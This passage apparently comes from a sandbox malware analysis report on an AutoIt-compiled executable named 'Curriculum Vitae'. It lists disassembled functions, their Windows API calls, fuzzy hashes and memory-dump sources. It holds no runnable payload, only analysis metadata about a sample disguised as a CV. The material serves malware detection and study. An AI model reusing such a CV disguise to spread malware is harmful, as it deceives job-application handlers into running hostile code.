                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dd5b6f464627ded09b17d10a9c72e9f03628313c620d89a8946360bc7af0696b
                      • Instruction ID: ec4f92e2596038c65385db507b45c393d587f5eb7cba239f586e250959004c03
                      • Opcode Fuzzy Hash: dd5b6f464627ded09b17d10a9c72e9f03628313c620d89a8946360bc7af0696b
                      • Instruction Fuzzy Hash: 22322431D2AF454ED7239638D8223356389AFB73C9F14D737F81AB5AA9EB29C4834110
                      Function 00D4CC39 Relevance: .6, Instructions: 635COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 07640f89cd069f3c3eea3ab50bc0abd752cc4a6cbf4e07ca9f1722cf5d790347
                      • Instruction ID: 3beea338824f6985a872734091eab14b909814a9ddaa4fd7c9227377928a67eb
                      • Opcode Fuzzy Hash: 07640f89cd069f3c3eea3ab50bc0abd752cc4a6cbf4e07ca9f1722cf5d790347
                      • Instruction Fuzzy Hash: 69322631A20215CBCF28EF29C4D467D77A1EF85300F2DA56AD99ADB291E230DD81DB71
                      Function 00D37920 Relevance: .6, Instructions: 563COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8c65a5d82a76b01c4fd2697e84266466ca36c01c409a8f141b8248a7a35cfd07
                      • Instruction ID: fedc1ea6c4a6d06aae7e711af3d300879ab576027d804b46b1beaeaf20fbe2fc
                      • Opcode Fuzzy Hash: 8c65a5d82a76b01c4fd2697e84266466ca36c01c409a8f141b8248a7a35cfd07
                      • Instruction Fuzzy Hash: 6A22C1B0A04609DFDF14CF64D881AAEB7F1FF44300F248529E85AA7295EB75E914CB71
                      Function 00D391C0 Relevance: .5, Instructions: 475COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 14ecc7c83d8592e490b1626484a4ee119666bc63f3e0510fd235378f2167a7b3
                      • Instruction ID: b9771c332408ae46b20d79299e84ce99752f46797f8d12b23780d0b1253d0052
                      • Opcode Fuzzy Hash: 14ecc7c83d8592e490b1626484a4ee119666bc63f3e0510fd235378f2167a7b3
                      • Instruction Fuzzy Hash: 1B02B6B0E00205EBDB05DF54D881AAEB7B1FF48300F558169E85ADB291FB71EA14CBB5
                      Function 00D519B0 Relevance: .2, Instructions: 240COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                      • Instruction ID: f5f9229085d204cc7f62e4dfe39b33a68177bc8a17b46b1804eb9ff01cd48c9e
                      • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                      • Instruction Fuzzy Hash: 5B91407A2090A34ADF2A467A857423DFEE15A923A371E0799DCF2CA1C1FA14C55DDA30
                      Function 00D57A4A Relevance: .2, Instructions: 237COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 911380456ccecb0412508c014ac495830fa6d57d52d2a8fb21f3915b01489768
                      • Instruction ID: ba9704deb81a97344c886a86775d69e4e2fa8e2e9a647d466a9ca241e6f2ac5b
                      • Opcode Fuzzy Hash: 911380456ccecb0412508c014ac495830fa6d57d52d2a8fb21f3915b01489768
                      • Instruction Fuzzy Hash: F0613671A0870957EF349A28B895BBE2394DF41703F3C0919EC86DB281DA11DE4EC775
                      Function 00D57CA7 Relevance: .2, Instructions: 237COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 87d1d495bd2be994bbf1261d3c2a1c079bae7feca788602e169aae04a4c698d0
                      • Instruction ID: 5a8e0f611d5073daccd11ec09b799786f7117225440d549c9a9f5b48adbf0735
                      • Opcode Fuzzy Hash: 87d1d495bd2be994bbf1261d3c2a1c079bae7feca788602e169aae04a4c698d0
                      • Instruction Fuzzy Hash: 89616D7160870AD6DE3449287856BBE23A4EF41743F38095BFC83DB281EA12DD4E9675
                      Function 00D51706 Relevance: .2, Instructions: 232COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                      • Instruction ID: 71f979ccc922275012f1772996d44229387ca37fdc84371334058fcca64e013b
                      • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                      • Instruction Fuzzy Hash: 5281407A5080A24ADF294239853467EFFE15A923A371E079DDCF2CA1C1EE14D95CDA30
                      Function 00DB2ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                      Download Yara Rule
                      APIs
                      • DeleteObject.GDI32(00000000), ref: 00DB2B30
                      • DeleteObject.GDI32(00000000), ref: 00DB2B43
                      • DestroyWindow.USER32 ref: 00DB2B52
                      • GetDesktopWindow.USER32 ref: 00DB2B6D
                      • GetWindowRect.USER32(00000000), ref: 00DB2B74
                      • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00DB2CA3
                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00DB2CB1
                      • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB2CF8
                      • GetClientRect.USER32(00000000,?), ref: 00DB2D04
                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00DB2D40
                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB2D62
                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB2D75
                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB2D80
                      • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB2D89
                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB2D98
                      • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB2DA1
                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB2DA8
                      • GlobalFree.KERNEL32(00000000), ref: 00DB2DB3
                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB2DC5
                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00DCFC38,00000000), ref: 00DB2DDB
                      • GlobalFree.KERNEL32(00000000), ref: 00DB2DEB
                      • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00DB2E11
                      • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00DB2E30
                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB2E52
                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB303F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                      • String ID: $AutoIt v3$DISPLAY$static
                      • API String ID: 2211948467-2373415609
                      • Opcode ID: fe2f8fdad03b8ef2d903c874ac4999f4be0dfc1c9338121790cb7a5f77514e19
                      • Instruction ID: f4834e41df39e32dd229f821a114a834eedbaf54796c178e3324e1dc2d12e5dc
                      • Opcode Fuzzy Hash: fe2f8fdad03b8ef2d903c874ac4999f4be0dfc1c9338121790cb7a5f77514e19
                      • Instruction Fuzzy Hash: ED025C72910206EFDB14DF65CD89EAE7BB9EF48710F048158F919AB2A1CB74AD05CB70
                      Function 00DC70D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                      Download Yara Rule
                      APIs
                      • SetTextColor.GDI32(?,00000000), ref: 00DC712F
                      • GetSysColorBrush.USER32(0000000F), ref: 00DC7160
                      • GetSysColor.USER32(0000000F), ref: 00DC716C
                      • SetBkColor.GDI32(?,000000FF), ref: 00DC7186
                      • SelectObject.GDI32(?,?), ref: 00DC7195
                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00DC71C0
                      • GetSysColor.USER32(00000010), ref: 00DC71C8
                      • CreateSolidBrush.GDI32(00000000), ref: 00DC71CF
                      • FrameRect.USER32(?,?,00000000), ref: 00DC71DE
                      • DeleteObject.GDI32(00000000), ref: 00DC71E5
                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00DC7230
                      • FillRect.USER32(?,?,?), ref: 00DC7262
                      • GetWindowLongW.USER32(?,000000F0), ref: 00DC7284
                        • Part of subcall function 00DC73E8: GetSysColor.USER32(00000012), ref: 00DC7421
                        • Part of subcall function 00DC73E8: SetTextColor.GDI32(?,?), ref: 00DC7425
                        • Part of subcall function 00DC73E8: GetSysColorBrush.USER32(0000000F), ref: 00DC743B
                        • Part of subcall function 00DC73E8: GetSysColor.USER32(0000000F), ref: 00DC7446
                        • Part of subcall function 00DC73E8: GetSysColor.USER32(00000011), ref: 00DC7463
                        • Part of subcall function 00DC73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00DC7471
                        • Part of subcall function 00DC73E8: SelectObject.GDI32(?,00000000), ref: 00DC7482
                        • Part of subcall function 00DC73E8: SetBkColor.GDI32(?,00000000), ref: 00DC748B
                        • Part of subcall function 00DC73E8: SelectObject.GDI32(?,?), ref: 00DC7498
                        • Part of subcall function 00DC73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00DC74B7
                        • Part of subcall function 00DC73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00DC74CE
                        • Part of subcall function 00DC73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00DC74DB
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                      • String ID:
                      • API String ID: 4124339563-0
                      • Opcode ID: 4cf23e42874ae9ad62e0f96a87215ba10802715543c52abc011f73c0b4d30fa6
                      • Instruction ID: 788297f9ebc4456e39842eba88cda2a8637d18928181aa0c3a0e9c0738cfc67b
                      • Opcode Fuzzy Hash: 4cf23e42874ae9ad62e0f96a87215ba10802715543c52abc011f73c0b4d30fa6
                      • Instruction Fuzzy Hash: 9FA18D72418303AFDB019F60DC48F5ABBA9FB49320F141A19FAA6D62E1D731E9448F61
                      Function 00D48D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                      Download Yara Rule
                      APIs
                      • DestroyWindow.USER32(?,?), ref: 00D48E14
                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 00D86AC5
                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00D86AFE
                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00D86F43
                        • Part of subcall function 00D48F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D48BE8,?,00000000,?,?,?,?,00D48BBA,00000000,?), ref: 00D48FC5
                      • SendMessageW.USER32(?,00001053), ref: 00D86F7F
                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00D86F96
                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00D86FAC
                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00D86FB7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                      • String ID: 0
                      • API String ID: 2760611726-4108050209
                      • Opcode ID: d16492a0327f9a5524b1eff01b6a51c232591f2240f62141145378da5266c255
                      • Instruction ID: d31e19397c5acdff152b69988e4782c568d907d73313faad0207dc897838fd12
                      • Opcode Fuzzy Hash: d16492a0327f9a5524b1eff01b6a51c232591f2240f62141145378da5266c255
                      • Instruction Fuzzy Hash: 91129E30600202DFDB25EF14C844BA9B7E5FB44321F588469F589DB261CB32EC92DB71
                      Function 00DB2711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                      Download Yara Rule
                      APIs
                      • DestroyWindow.USER32(00000000), ref: 00DB273E
                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00DB286A
                      • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00DB28A9
                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00DB28B9
                      • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00DB2900
                      • GetClientRect.USER32(00000000,?), ref: 00DB290C
                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00DB2955
                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00DB2964
                      • GetStockObject.GDI32(00000011), ref: 00DB2974
                      • SelectObject.GDI32(00000000,00000000), ref: 00DB2978
                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00DB2988
                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DB2991
                      • DeleteDC.GDI32(00000000), ref: 00DB299A
                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00DB29C6
                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 00DB29DD
                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00DB2A1D
                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00DB2A31
                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00DB2A42
                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00DB2A77
                      • GetStockObject.GDI32(00000011), ref: 00DB2A82
                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00DB2A8D
                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00DB2A97
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                      • API String ID: 2910397461-517079104
                      • Opcode ID: 2bfe883b48209278c93a0e7d840d496734fd872e37ab0a099a7511c7f66f7d96
                      • Instruction ID: fc5f28a0b950034ae24e84c90ad0829028a5819bd79291893f3b3902e64f0285
                      • Opcode Fuzzy Hash: 2bfe883b48209278c93a0e7d840d496734fd872e37ab0a099a7511c7f66f7d96
                      • Instruction Fuzzy Hash: B5B16D72A50306AFEB14DF69CC49FAE7BA9EB08710F048155FA15EB290D774ED40CBA4
                      Function 00DA4ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                      Download Yara Rule
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 00DA4AED
                      • GetDriveTypeW.KERNEL32(?,00DCCB68,?,\\.\,00DCCC08), ref: 00DA4BCA
                      • SetErrorMode.KERNEL32(00000000,00DCCB68,?,\\.\,00DCCC08), ref: 00DA4D36
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ErrorMode$DriveType
                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                      • API String ID: 2907320926-4222207086
                      • Opcode ID: 82317b833abf78d47773ab1a9bb9b1846fc66f043c0a2ee2d8f74d5456c09074
                      • Instruction ID: d5739436c4f5207f6a60059405e30667139d08975a68a3c934cf188dd345b853
                      • Opcode Fuzzy Hash: 82317b833abf78d47773ab1a9bb9b1846fc66f043c0a2ee2d8f74d5456c09074
                      • Instruction Fuzzy Hash: C561E63060620A9FCB04DF24CA81D7CB7B0EF86350B298415F94AABA91DBF1ED45DB71
                      Function 00DC73E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetSysColor.USER32(00000012), ref: 00DC7421
                      • SetTextColor.GDI32(?,?), ref: 00DC7425
                      • GetSysColorBrush.USER32(0000000F), ref: 00DC743B
                      • GetSysColor.USER32(0000000F), ref: 00DC7446
                      • CreateSolidBrush.GDI32(?), ref: 00DC744B
                      • GetSysColor.USER32(00000011), ref: 00DC7463
                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00DC7471
                      • SelectObject.GDI32(?,00000000), ref: 00DC7482
                      • SetBkColor.GDI32(?,00000000), ref: 00DC748B
                      • SelectObject.GDI32(?,?), ref: 00DC7498
                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00DC74B7
                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00DC74CE
                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00DC74DB
                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00DC752A
                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00DC7554
                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00DC7572
                      • DrawFocusRect.USER32(?,?), ref: 00DC757D
                      • GetSysColor.USER32(00000011), ref: 00DC758E
                      • SetTextColor.GDI32(?,00000000), ref: 00DC7596
                      • DrawTextW.USER32(?,00DC70F5,000000FF,?,00000000), ref: 00DC75A8
                      • SelectObject.GDI32(?,?), ref: 00DC75BF
                      • DeleteObject.GDI32(?), ref: 00DC75CA
                      • SelectObject.GDI32(?,?), ref: 00DC75D0
                      • DeleteObject.GDI32(?), ref: 00DC75D5
                      • SetTextColor.GDI32(?,?), ref: 00DC75DB
                      • SetBkColor.GDI32(?,?), ref: 00DC75E5
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                      • String ID:
                      • API String ID: 1996641542-0
                      • Opcode ID: c09ba72fe1b2f853d413972ef07545cb6b801fb10d0b165dc5f2b1286879a086
                      • Instruction ID: 5a6d112e0a2427a7411e5c0cdd7e82a25763c552e7afc35331ede9d3801cb0ab
                      • Opcode Fuzzy Hash: c09ba72fe1b2f853d413972ef07545cb6b801fb10d0b165dc5f2b1286879a086
